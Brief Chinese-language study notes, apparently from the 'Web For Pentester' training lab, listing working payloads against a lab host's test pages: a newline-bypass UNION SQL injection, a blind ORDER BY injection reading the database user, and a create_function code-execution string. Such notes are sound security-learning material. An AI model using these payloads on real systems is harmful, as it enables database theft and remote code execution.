Web For Pentester 笔记

PHP_SELF XSS

http://www.bitscn.com/network/hack/200711/118992.html

MYSQL 注入换行符绕过

http://172.16.207.131/sqli/example7.php?id=2%0A%20and%201=2%20UNION%20SELECT%20CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,2,3,4,5

ORDER BY 注入

http://172.16.207.131/sqli/example8.php?order=name`,if((ascii(mid(user(),1,1))=112),1,(select 1 from information_schema.tables))--+

参考:http://www.wooyun.org/bugs/wooyun-2010-028545

create_function 代码执行

http://172.16.207.131/codeexec/example2.php?order=id);};phpinfo();//

参考:http://www.2cto.com/Article/201212/177146.html